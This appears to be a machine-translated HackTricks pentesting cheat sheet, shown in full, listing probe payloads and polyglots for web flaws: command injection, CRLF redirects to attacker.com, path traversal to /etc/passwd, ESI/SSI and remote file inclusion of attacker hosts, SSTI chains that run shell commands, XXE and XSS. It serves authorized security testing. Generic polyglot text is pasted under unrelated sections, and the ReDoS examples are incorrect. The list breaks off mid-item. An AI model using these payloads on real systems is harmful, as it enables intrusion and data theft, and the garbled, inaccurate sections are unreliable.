hacktricks/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
2023-07-07 23:42:27 +00:00

61 KiB
Raw Blame History

☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥

これらのPoCずPolyglothsの目的は、テスタヌが入力が応答に反映されおいる堎合に利甚できる脆匱性の芁玄を迅速に提䟛するこずです。

{% hint style="warning" %} このチヌトシヌトは、各脆匱性のテストの包括的なリストを提案しおいたせん。基本的なテストのみを提䟛しおいたす。より包括的なテストを探しおいる堎合は、提案された各脆匱性にアクセスしおください。 {% endhint %}

{% hint style="danger" %} Content-Typeに䟝存するXXEのようなむンゞェクションは芋぀かりたせん。通垞、XMLデヌタを送信するリク゚ストが芋぀かった堎合は、自分で詊すこずになるでしょう。たた、ここではデヌタベヌスむンゞェクションも芋぀かりたせん。なぜなら、いく぀かのコンテンツが反映されるかもしれたせんが、それはバック゚ンドのDBテクノロゞヌず構造に倧きく䟝存するからです。 {% endhint %}

Polyglothsリスト

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

クラむアントサむドテンプレヌトむンゞェクション

基本的なテスト

{{7*7}}
[7*7]

ポリグロット

A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.

ポリグロットは、開かれる文脈によっお異なるファむルタむプずしお解釈されるこずができるファむルです。りェブハッキングの文脈では、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。

Polyglot File Types

ポリグロットファむルの皮類

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing for the execution of JavaScript code within an HTML context.

  • HTML/JavaScript ポリグロット: これらのファむルは、HTMLずJavaScriptの䞡方ずしお解釈されるこずができ、HTMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript, allowing for the execution of JavaScript code within an XML context.

  • XML/JavaScript ポリグロット: これらのファむルは、XMLずJavaScriptの䞡方ずしお解釈されるこずができ、XMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • SVG/JavaScript Polyglots: These files can be interpreted as both SVG and JavaScript, allowing for the execution of JavaScript code within an SVG context.

  • SVG/JavaScript ポリグロット: これらのファむルは、SVGずJavaScriptの䞡方ずしお解釈されるこずができ、SVGのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing for the execution of JavaScript code within an image context.

  • 画像/JavaScript ポリグロット: これらのファむルは、画像ファむルずJavaScriptの䞡方ずしお解釈されるこずができ、画像のコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing for the execution of JavaScript code within a PDF context.

  • PDF/JavaScript ポリグロット: これらのファむルは、PDFずJavaScriptの䞡方ずしお解釈されるこずができ、PDFのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript, allowing for the execution of JavaScript code within a ZIP context.

  • ZIP/JavaScript ポリグロット: これらのファむルは、ZIPアヌカむブずJavaScriptの䞡方ずしお解釈されるこずができ、ZIPのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

Polyglot Techniques

ポリグロットのテクニック

  • Comment Polyglots: These polyglots exploit the fact that different file types have different comment syntaxes. By strategically placing comments, a file can be interpreted differently depending on the context.

  • コメントポリグロット: これらのポリグロットは、異なるファむルタむプには異なるコメントの構文があるずいう事実を利甚しおいたす。コメントを戊略的に配眮するこずで、ファむルはコンテキストに応じお異なる解釈ができたす。

  • Extension Polyglots: These polyglots exploit the fact that different file types have different file extensions. By using a specific file extension, a file can be interpreted as a different file type.

  • 拡匵子ポリグロット: これらのポリグロットは、異なるファむルタむプには異なるファむル拡匵子があるずいう事実を利甚しおいたす。特定のファむル拡匵子を䜿甚するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。

  • Content Polyglots: These polyglots exploit the fact that different file types have different content structures. By carefully crafting the content of a file, it can be interpreted as different file types.

  • コンテンツポリグロット: これらのポリグロットは、異なるファむルタむプには異なるコンテンツ構造があるずいう事実を利甚しおいたす。ファむルのコンテンツを泚意深く䜜成するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。

  • MIME Type Polyglots: These polyglots exploit the fact that different file types have different MIME types. By specifying a specific MIME type, a file can be interpreted as a different file type.

  • MIMEタむプポリグロット: これらのポリグロットは、異なるファむルタむプには異なるMIMEタむプがあるずいう事実を利甚しおいたす。特定のMIMEタむプを指定するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。

  • Encoding Polyglots: These polyglots exploit the fact that different file types have different character encodings. By using a specific character encoding, a file can be interpreted as a different file type.

  • ゚ンコヌディングポリグロット: これらのポリグロットは、異なるファむルタむプには異なる文字゚ンコヌディングがあるずいう事実を利甚しおいたす。特定の文字゚ンコヌディングを䜿甚するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。

{{7*7}}[7*7]

コマンドむンゞェクション

基本的なテスト

;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

ポリグロット

A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.

ポリグロットは、開かれる文脈によっお異なるファむルタむプずしお解釈されるこずができるファむルです。りェブハッキングの文脈では、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。

Polyglot File Types

ポリグロットファむルの皮類

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing attackers to execute malicious code in the browser.

  • HTML/JavaScript ポリグロット: これらのファむルはHTMLずJavaScriptの䞡方ずしお解釈されるため、攻撃者はブラりザで悪意のあるコヌドを実行するこずができたす。

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing attackers to exploit vulnerabilities in PDF readers.

  • PDF/JavaScript ポリグロット: これらのファむルはPDFずJavaScriptの䞡方ずしお解釈されるため、攻撃者はPDFリヌダヌの脆匱性を悪甚するこずができたす。

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing attackers to hide malicious code within seemingly harmless images.

  • 画像/JavaScript ポリグロット: これらのファむルは画像ファむルずJavaScriptの䞡方ずしお解釈されるため、攻撃者は芋かけ䞊無害な画像内に悪意のあるコヌドを隠すこずができたす。

Polyglot Techniques

ポリグロットのテクニック

  • Comment Injection: By injecting specific comments into a file, it can be interpreted as multiple file types. For example, injecting HTML comments into a JavaScript file can make it a valid HTML file as well.

  • コメントむンゞェクション: 特定のコメントをファむルに泚入するこずで、耇数のファむルタむプずしお解釈されるこずがありたす。䟋えば、JavaScriptファむルにHTMLコメントを泚入するこずで、それを有効なHTMLファむルにするこずができたす。

  • File Extension Manipulation: By manipulating the file extension, a file can be interpreted as a different file type. For example, changing the extension of a JavaScript file to ".jpg" can make it appear as an image file.

  • ファむル拡匵子の操䜜: ファむルの拡匵子を操䜜するこずで、ファむルを異なるファむルタむプずしお解釈するこずができたす。䟋えば、JavaScriptファむルの拡匵子を".jpg"に倉曎するこずで、それを画像ファむルずしお衚瀺するこずができたす。

  • Content Sniffing: By manipulating the content of a file, it can be interpreted as a different file type. For example, adding specific bytes at the beginning of a file can make it appear as a different file type to content sniffing algorithms.

  • コンテンツスニッフィング: ファむルの内容を操䜜するこずで、ファむルを異なるファむルタむプずしお解釈するこずができたす。䟋えば、ファむルの先頭に特定のバむトを远加するこずで、コンテンツスニッフィングアルゎリズムによっお異なるファむルタむプずしお衚瀺されるこずがありたす。

Polyglot Tools

ポリグロットツヌル

  • Polyglot Image Generator: A tool that generates polyglot images that can be interpreted as both image files and JavaScript.

  • ポリグロットむメヌゞゞェネレヌタ: 画像ファむルずJavaScriptの䞡方ずしお解釈されるポリグロットむメヌゞを生成するツヌル。

  • Polyglot PDF Generator: A tool that generates polyglot PDF files that can be interpreted as both PDF and JavaScript.

  • ポリグロットPDFゞェネレヌタ: PDFずJavaScriptの䞡方ずしお解釈されるポリグロットPDFファむルを生成するツヌル。

  • Polyglot HTML/JavaScript Generator: A tool that generates polyglot files that can be interpreted as both HTML and JavaScript.

  • ポリグロットHTML/JavaScriptゞェネレヌタ: HTMLずJavaScriptの䞡方ずしお解釈されるポリグロットファむルを生成するツヌル。

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

CRLF

基本的なテスト

CRLF Injection

CRLFむンゞェクションは、改行文字CRLFを悪甚しお攻撃者がWebアプリケヌションに䞍正な改行を挿入するこずができる脆匱性です。これにより、攻撃者はHTTPヘッダヌの改ざん、クッキヌの盗み取り、リダむレクトの悪甚など、さたざたな攻撃を実行するこずができたす。

以䞋は、CRLFむンゞェクションをテストするための基本的な手法です。

1. 改行文字の挿入

攻撃者は、改行文字%0d%0aたたは%0aを入力フィヌルドに挿入しお、改行を発生させるこずができたす。これにより、攻撃者はHTTPヘッダヌを改ざんするなどの攻撃を行うこずができたす。

2. リダむレクトの悪甚

攻撃者は、改行文字を䜿甚しおリダむレクトを悪甚するこずができたす。䟋えば、以䞋のようなURLを䜜成するこずができたす。

http://example.com/%0d%0aLocation:%20http://attacker.com

このURLをクリックするず、ナヌザヌは攻撃者のサむトにリダむレクトされたす。

3. クッキヌの盗み取り

攻撃者は、改行文字を䜿甚しおクッキヌを盗み取るこずができたす。䟋えば、以䞋のようなURLを䜜成するこずができたす。

http://example.com/%0d%0aSet-Cookie:%20sessionid=attacker

このURLをクリックするず、攻撃者はナヌザヌのセッションIDを盗み取るこずができたす。

CRLFむンゞェクションの怜出

CRLFむンゞェクションの脆匱性を怜出するためには、以䞋の手法を䜿甚するこずができたす。

1. ペヌゞの゜ヌスコヌドの確認

Webアプリケヌションの゜ヌスコヌドを確認し、入力フィヌルドやリダむレクト凊理などで改行文字が適切に凊理されおいるかどうかを確認したす。

2. リク゚ストのキャプチャ

攻撃者が改行文字を挿入する可胜性があるリク゚ストをキャプチャし、改行文字が正しく凊理されおいるかどうかを確認したす。

3. レスポンスの確認

攻撃者が改行文字を挿入する可胜性があるレスポンスを確認し、改行文字が正しく凊理されおいるかどうかを確認したす。

以䞊がCRLFむンゞェクションの基本的なテスト手法です。これらの手法を䜿甚しお、WebアプリケヌションのCRLFむンゞェクションの脆匱性を怜出するこずができたす。

%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

基本テスト

HTML Injection

Description

HTML Injection is a vulnerability that allows an attacker to inject malicious HTML code into a vulnerable web application. This can lead to various attacks such as Cross-Site Scripting (XSS), defacement of the website, or even the theft of sensitive information.

Test

To test for HTML Injection, you can try injecting HTML tags into user input fields or parameters in the URL. For example, you can try injecting the following code:

<script>alert('XSS')</script>

If the web application is vulnerable to HTML Injection, the injected code will be executed and the alert message will be displayed.

SQL Injection

Description

SQL Injection is a vulnerability that allows an attacker to manipulate the SQL queries executed by a web application's database. This can lead to unauthorized access, data leakage, or even the complete compromise of the application.

Test

To test for SQL Injection, you can try injecting SQL statements into user input fields or parameters in the URL. For example, you can try injecting the following code:

' OR '1'='1

If the web application is vulnerable to SQL Injection, the injected code will modify the original SQL query and potentially return unintended results.

Command Injection

Description

Command Injection is a vulnerability that allows an attacker to execute arbitrary commands on the underlying operating system. This can lead to unauthorized access, data manipulation, or even the complete compromise of the system.

Test

To test for Command Injection, you can try injecting commands into user input fields or parameters in the URL. For example, you can try injecting the following code:

; ls

If the web application is vulnerable to Command Injection, the injected code will be executed and the output of the ls command will be displayed.

Path Traversal

Description

Path Traversal is a vulnerability that allows an attacker to access files and directories outside of the web application's intended directory structure. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.

Test

To test for Path Traversal, you can try accessing files or directories outside of the web application's intended directory structure. For example, you can try accessing the following URL:

http://example.com/../../../../etc/passwd

If the web application is vulnerable to Path Traversal, the contents of the /etc/passwd file will be displayed.

Server-Side Request Forgery (SSRF)

Description

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external resources on behalf of the vulnerable server. This can lead to unauthorized access, data leakage, or even the compromise of other systems.

Test

To test for SSRF, you can try making requests to internal or external resources using the vulnerable server as a proxy. For example, you can try accessing the following URL:

http://example.com/proxy?url=http://internal-resource.com

If the web application is vulnerable to SSRF, the request to internal-resource.com will be made and the response will be displayed.

Remote File Inclusion (RFI)

Description

Remote File Inclusion (RFI) is a vulnerability that allows an attacker to include remote files in a web application. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.

Test

To test for RFI, you can try including a remote file in the web application. For example, you can try accessing the following URL:

http://example.com/index.php?page=http://attacker.com/malicious-code.php

If the web application is vulnerable to RFI, the remote file http://attacker.com/malicious-code.php will be included and its contents will be executed.

XML External Entity (XXE) Injection

Description

XML External Entity (XXE) Injection is a vulnerability that allows an attacker to include external entities or files in XML documents processed by a web application. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.

Test

To test for XXE Injection, you can try including an external entity in an XML document processed by the web application. For example, you can try injecting the following code:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

If the web application is vulnerable to XXE Injection, the contents of the /etc/passwd file will be displayed.

Server-Side Template Injection (SSTI)

Description

Server-Side Template Injection (SSTI) is a vulnerability that allows an attacker to inject malicious code into server-side templates. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.

Test

To test for SSTI, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:

{{7*'7'.__class__.__mro__[1].__subclasses__()[414]('ls',shell=True,stdout=-1).communicate()}}

If the web application is vulnerable to SSTI, the injected code will be executed and the output of the ls command will be displayed.

Server-Side JavaScript Injection (SSJI)

Description

Server-Side JavaScript Injection (SSJI) is a vulnerability that allows an attacker to inject and execute JavaScript code on the server-side of a web application. This can lead to unauthorized access, data leakage, or even the complete compromise of the application.

Test

To test for SSJI, you can try injecting JavaScript code into server-side components of the web application. For example, you can try injecting the following code:

var fs = require('fs');
fs.readdir('/', function(err, files) {
    if (err) throw err;
    console.log(files);
});

If the web application is vulnerable to SSJI, the injected code will be executed and the contents of the root directory will be displayed.

Server-Side Template Injection (SSTI) in Flask/Jinja2

Description

Server-Side Template Injection (SSTI) in Flask/Jinja2 is a vulnerability that allows an attacker to inject malicious code into server-side templates used by Flask/Jinja2. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.

Test

To test for SSTI in Flask/Jinja2, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:

{{config.items().__class__.__mro__[2].__subclasses__()[40]()._module.__builtins__['__import__']('os').popen('ls').read()}}

If the web application is vulnerable to SSTI in Flask/Jinja2, the injected code will be executed and the output of the ls command will be displayed.

Server-Side Template Injection (SSTI) in Django

Description

Server-Side Template Injection (SSTI) in Django is a vulnerability that allows an attacker to inject malicious code into server-side templates used by Django. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.

Test

To test for SSTI in Django, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:

{{config.__class__.__init__.__globals__['__builtins__']['__import__']('os').popen('ls').read()}}

If the web application is vulnerable to SSTI in Django, the injected code will be executed and the output of the ls command will be displayed.

<br><b><h1>THIS IS AND INJECTED TITLE </h1>

ファむルむンクルヌゞョン/パストラバヌサル

基本的なテスト

/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php

オヌプンリダむレクト / サヌバヌサむドリク゚ストフォヌゞェリ

基本的なテスト

www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)

ReDoS

基本的なテスト

Test 1: Single Character Matching

Description

This test checks for the vulnerability of a regular expression to ReDoS when matching a single character.

PoC

/^(a+)+$/.test('a')

Expected Result

The regular expression /^(a+)+$/ should match the string 'a' without causing excessive backtracking.

Test 2: Multiple Character Matching

Description

This test checks for the vulnerability of a regular expression to ReDoS when matching multiple characters.

PoC

/^(ab+)+$/.test('ab')

Expected Result

The regular expression /^(ab+)+$/ should match the string 'ab' without causing excessive backtracking.

Test 3: Nested Quantifiers

Description

This test checks for the vulnerability of a regular expression to ReDoS when using nested quantifiers.

PoC

/^(a+b+)+$/.test('ab')

Expected Result

The regular expression /^(a+b+)+$/ should match the string 'ab' without causing excessive backtracking.

(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$

サヌバヌサむドむンクルヌゞョン/゚ッゞサむドむンクルヌゞョン

基本的なテスト

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

ポリグロット

A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.

ポリグロットは、開かれる文脈によっお異なるファむルタむプずしお解釈されるこずができるファむルです。りェブハッキングの文脈では、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。

Polyglot Techniques

Comment Polyglots

Comment polyglots exploit the fact that different file types have different comment syntax. By strategically placing comments in a file, it can be interpreted as multiple file types.

コメントポリグロット

コメントポリグロットは、異なるファむルタむプには異なるコメントの構文があるずいう事実を利甚したす。ファむルにコメントを戊略的に配眮するこずで、耇数のファむルタむプずしお解釈されるこずがありたす。

Extension Polyglots

Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as multiple file types.

拡匵子ポリグロット

拡匵子ポリグロットは、異なるファむルタむプには異なるファむル拡匵子があるずいう事実を利甚したす。特定の組み合わせのファむル拡匵子を䜿甚するこずで、ファむルは耇数のファむルタむプずしお解釈されるこずがありたす。

MIME Type Polyglots

MIME type polyglots exploit the fact that different file types have different MIME types. By manipulating the MIME type of a file, it can be interpreted as multiple file types.

MIMEタむプポリグロット

MIMEタむプポリグロットは、異なるファむルタむプには異なるMIMEタむプがあるずいう事実を利甚したす。ファむルのMIMEタむプを操䜜するこずで、ファむルは耇数のファむルタむプずしお解釈されるこずがありたす。

Conclusion

Polyglots are powerful tools in the arsenal of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.

結論

ポリグロットは、ハッカヌの歊噚の䞭でも匷力なツヌルです。ファむルタむプの異なる解釈を利甚するこずで、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。セキュリティの専門家は、ポリグロットの技術に぀いお認識しおおくこずが重芁です。これにより、効果的に察凊するこずができたす。

<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

サヌバヌサむドリク゚ストフォヌゞェリ

オヌプンリダむレクトに䜿甚されるテストず同じものがここでも䜿甚できたす。

サヌバヌサむドテンプレヌトむンゞェクション

基本的なテスト

${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

ポリグロット

A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.

ポリグロットは、開かれる文脈によっお異なるファむルタむプずしお解釈されるこずができるファむルです。りェブハッキングの文脈では、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。

Polyglot Techniques

Comment Polyglots

Comment polyglots exploit the fact that different file types have different comment syntax. By strategically placing comments in a file, it can be interpreted as multiple file types.

コメントポリグロット

コメントポリグロットは、異なるファむルタむプには異なるコメントの構文があるずいう事実を利甚したす。ファむルにコメントを戊略的に配眮するこずで、耇数のファむルタむプずしお解釈されるこずがありたす。

Extension Polyglots

Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as multiple file types.

拡匵子ポリグロット

拡匵子ポリグロットは、異なるファむルタむプには異なるファむル拡匵子があるずいう事実を利甚したす。特定の組み合わせのファむル拡匵子を䜿甚するこずで、ファむルは耇数のファむルタむプずしお解釈されるこずがありたす。

MIME Type Polyglots

MIME type polyglots exploit the fact that different file types have different MIME types. By manipulating the MIME type of a file, it can be interpreted as multiple file types.

MIMEタむプポリグロット

MIMEタむプポリグロットは、異なるファむルタむプには異なるMIMEタむプがあるずいう事実を利甚したす。ファむルのMIMEタむプを操䜜するこずで、ファむルは耇数のファむルタむプずしお解釈されるこずがありたす。

Conclusion

Polyglots are powerful tools in the arsenal of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.

結論

ポリグロットは、ハッカヌの歊噚の䞭でも匷力なツヌルです。ファむルタむプの異なる解釈を利甚するこずで、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。セキュリティの専門家は、ポリグロットの技術に぀いお認識しおおくこずが重芁です。これにより、効果的に察凊するこずができたす。

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\

XSLT サヌバヌサむドむンゞェクション

基本的なテスト

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

ポリグロット

A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.

ポリグロットは、開かれる文脈によっお異なるファむルタむプずしお解釈されるこずができるファむルです。りェブハッキングの文脈では、ポリグロットはセキュリティ察策を回避し、悪意のあるコヌドを実行するために䜿甚されるこずがありたす。

Polyglot File Types

ポリグロットファむルの皮類

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing for the execution of JavaScript code within an HTML context.

  • HTML/JavaScript ポリグロット: これらのファむルは、HTMLずJavaScriptの䞡方ずしお解釈されるこずができ、HTMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript, allowing for the execution of JavaScript code within an XML context.

  • XML/JavaScript ポリグロット: これらのファむルは、XMLずJavaScriptの䞡方ずしお解釈されるこずができ、XMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • SVG/JavaScript Polyglots: These files can be interpreted as both SVG and JavaScript, allowing for the execution of JavaScript code within an SVG context.

  • SVG/JavaScript ポリグロット: これらのファむルは、SVGずJavaScriptの䞡方ずしお解釈されるこずができ、SVGのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing for the execution of JavaScript code within an image context.

  • 画像/JavaScript ポリグロット: これらのファむルは、画像ファむルずJavaScriptの䞡方ずしお解釈されるこずができ、画像のコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing for the execution of JavaScript code within a PDF context.

  • PDF/JavaScript ポリグロット: これらのファむルは、PDFずJavaScriptの䞡方ずしお解釈されるこずができ、PDFのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript, allowing for the execution of JavaScript code within a ZIP context.

  • ZIP/JavaScript ポリグロット: これらのファむルは、ZIPアヌカむブずJavaScriptの䞡方ずしお解釈されるこずができ、ZIPのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

Advantages of Polyglots

ポリグロットの利点

  • Bypassing Security Measures: Polyglots can be used to bypass security measures that are designed to detect specific file types. By appearing as multiple file types, polyglots can evade detection and execute malicious code.

  • セキュリティ察策の回避: ポリグロットは、特定のファむルタむプを怜出するために蚭蚈されたセキュリティ察策を回避するために䜿甚するこずができたす。耇数のファむルタむプずしお衚瀺されるこずで、ポリグロットは怜出を回避し、悪意のあるコヌドを実行するこずができたす。

  • Exploiting Vulnerabilities: Polyglots can be used to exploit vulnerabilities in software that handle different file types. By tricking the software into interpreting the polyglot as a specific file type, an attacker can execute malicious code and gain unauthorized access.

  • 脆匱性の悪甚: ポリグロットは、異なるファむルタむプを凊理する゜フトりェアの脆匱性を悪甚するために䜿甚するこずができたす。ポリグロットを特定のファむルタむプずしお解釈させるこずで、攻撃者は悪意のあるコヌドを実行し、䞍正なアクセスを行うこずができたす。

  • Concealing Malicious Code: By embedding malicious code within a polyglot, an attacker can hide their intentions and make it more difficult for security measures to detect the code.

  • 悪意のあるコヌドの隠蔜: ポリグロットに悪意のあるコヌドを埋め蟌むこずで、攻撃者は自分の意図を隠し、セキュリティ察策がコヌドを怜出するのをより困難にするこずができたす。

<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

XSS

基本テスト

1. Alert

<script>alert('XSS');</script>

2. Image

<img src="x" onerror="alert('XSS');">

3. Input

<input type="text" value="<script>alert('XSS');</script>">
<a href="javascript:alert('XSS');">Click me</a>

5. SVG

<svg onload="alert('XSS');"></svg>

6. Style

<style>body{background-image:url('javascript:alert("XSS")');}</style>

7. Div

<div style="background-image:url(javascript:alert('XSS'))">Test</div>

8. Table

<table background="javascript:alert('XSS')">

9. Form

<form action="javascript:alert('XSS')">

10. Event Handler

<button onclick="alert('XSS')">Click me</button>

11. JavaScript URI

<a href="javascript:alert('XSS')">Click me</a>

12. Data URI

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ+">Click me</a>

13. Onload

<body onload="alert('XSS')">

14. Meta

